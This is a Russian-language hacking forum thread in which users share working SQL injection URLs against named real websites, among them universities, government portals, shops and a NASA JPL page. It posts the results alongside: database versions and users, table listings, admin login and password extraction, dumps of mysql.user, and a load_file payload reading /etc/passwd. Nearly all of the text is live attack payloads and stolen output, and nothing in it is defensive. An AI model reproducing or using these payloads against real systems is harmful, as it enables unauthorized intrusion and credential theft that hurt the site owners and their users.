SQL Инъекции

Code:

http://www.lonestar-sc.com/team_page.php?tid=506+Union+select+1,2,unhex(hex(concat_ws(0x3a,version(),database(),user()))),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user+limit+1,1/*

version():4.1.18
database():lonestar_sc
user():[email protected]

Есть табличка mysql.user

 

http://www.timbermarket.ro/detalii_oferta.php?id_oferta=-138+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

Database Version: 5.0.45
Database name: c2timbermarket
User name: c2timbermarket@localhost
Os : redhat-linux-gnu

 

PR 6

Code:

http://universitatestiu.url.[SIZE=3][COLOR=White]edu[/COLOR][/SIZE]/programa.php?id=-47+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--

5.0.75-0ubuntu10.2 : UE2009 : ue2009@localhost

Code:

http://universitatestiu.url.edu/programa.php?id=-47+union+select+1,2,concat_ws(0x3a,login,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+usuario--

 

Code:

http://ludesign.curious.nl/icds2009/subpage.php?ID=-1+union+select+1,2,3,4,5,6,version(),8,9/*

Database Version: 4.1.20-log
Database name: icds2009
User name: icds2009@localhost

 

[PR 3]

Code:

http://www.satgo.com.tw/shop/shop.php?id=-202+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123

4.0.21-log:satgocomtw:satgo.com.tw@localhost

 

Code:

http://www.sacredheartclonakilty.ie/programmes.php?id=-3+union+select+1,concat_ws(0x3a,username,password),3+from+administration/*&language=russian

Database Version: 5.0.41-community
Database name: pmcshane_sacred_heart
User name: pmcshane_admin@localhost

 

Code:

http://www.cezar.ua/a-articles/article.php?id=1+union+select+1,2,concat_ws(0x3a,login,password,email),4,5,6,7,8,9,10,11,12,13+from+cezar.aadm_users--

Database Version: 5.0.51a-24+lenny1-log
Database name: cezar
User name: u_cezar@localhost

 

HTML:

http://www.avtomarket.ks.ua/index.php?action=auto&type=new&id=-31+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
 

5.0.51a-log:avtomarket_auto:avtomarket_marke@s8

 

Code:

http://www.photolife.com/por.php?id=-481+union+select+1,2,3,unhex(hex(concat_ws(0x3a,version(),user(),database()))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35

4.1.7-standardhotolife@localhosthotolife

Code:

http://alkor.regioninfo.ru/news.php?id=-39+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12

5.0.45:alkorregi@localhost:alkorregi

Code:

http://www.altairest.ru/look_new.php?id=-18+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4

5.0.26-log:ayasuweb_rest@localhost:ayasuweb_rest

Code:

http://www.future-sense.co.za/pg.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),user(),database()),15,16,17

5.0.32-Debian_7etch10:[email protected]:db_futuresense

Code:

http://www.calvaryefc.com/pages/pg.php?id=-76+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22

4.0.27-standard-log:[email protected]:db162563135

 

Code:

http://www.calvin.edu/kuyers/journal.php?ID=-26+union+select+1,2,3,4,5,group_concat(table_name+separator+0x2f),7+from+information_schema.tables+where+table_schema+not+in('information_schema')--+

version: 5.0.67

Code:

http://www.gbcnv.edu/magic/article.php?op=Print&sid=-11+union+select+uid,2,uname,pass,umode,6,7,8+from+users--+

version: 4.0.18

 

*.nasa.gov

jpl.nasa.gov

version: 4.0.27
user: JPLSite@localhost

Code:

http://www.jpl.nasa.gov/news/profiles.cfm?profile=-11%22+union+select+1,2,3,4,5,null,7,8,9,0,1,2,3,4,5,6,7,8,9,0,user_name,2,3,4,user_password,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+login+limit+0,1/*

 

HTML:

http://efmf.ru/frame.v2.shtml?song-meng.v2.php?song_id=50+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6--

4.0.27-log:efmf:[email protected]

HTML:

http://michael-bg.com/products.php?sex_id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11--

4.0.27-standard:michael_michael:michael@localhost

 

http://www.bienvenueaparis.fr/flat.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,group_concat(table_name),37,38,39,40,41,42,43,44,45,46%20from%20information_schema.tables--

5 версия

 

http://www.demosgreatclone.com/youtubeclone/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15--

 

PR 4

Code:

http://cluster2.space.swri.[SIZE=4][COLOR=White]edu[/COLOR][/SIZE]/article.php?id=-1+union+select+1,2,version(),4,5,6,7,8/*

Database Version: 5.0.45
Database name: cluster2_management
User name: IDFSproc@localhost

 

Fata1ex
Прадолжу тваё дело.
http://www.depo.ba/page.php?id=2391+union+select+1,2,3,4,5,6+/*

 

Как мило. Я почему-то решил, что уж подобрать столбцы и вывести сможет любой ) Поэтому и нераскрученные... тем более недокрученных было всего 4 из 9 = ) Ну ладно

www.iddeea.gov.ba

Code:

http://www.iddeea.gov.ba/hr_vijesti.php?id=-191+union+select+1,concat(user(),0x3a,version()),3,4/*
[I]
[email protected]:5.0.45[/I]

Вывод из mysql.user есть ;)

[TABLES]
user
user_info
users
db

user:
User
Password

user_info:
Full_name
Email

users:
email

db:
db
user


Users.Email:
[email protected]
strateski.razvoj@etikete-agens
[email protected]
...

Ctacok, жжошь Сам бы ни за что не догадался

 

[email protected]: ocenshik:4.0.27

 

http://www.donland.ru/news.asp?Id=1+or+1=(SELECT+TOP+1+TABLE_NAME%20+FROM+INFORMATION_SCHEMA.TABLES)--

Плохо в MSSQL скулях так что не судите

 

PR 6

Code:

http://www.eohsi.rutgers[COLOR=Lime].edu[/COLOR]/facultystaff/view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,concat_ws(0x3a,user,password),49,50,51,52,53,54,55,56,57,58,59,60+from+mysql.user/*

Database Version: 4.0.12
Database name: eohsi
User name: root@localhost

/etc/passwd

Code:

http://www.eohsi.rutgers.edu/facultystaff/view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,load_file(0x2F6574632F706173737764),49,50,51,52,53,54,55,56,57,58,59,60/*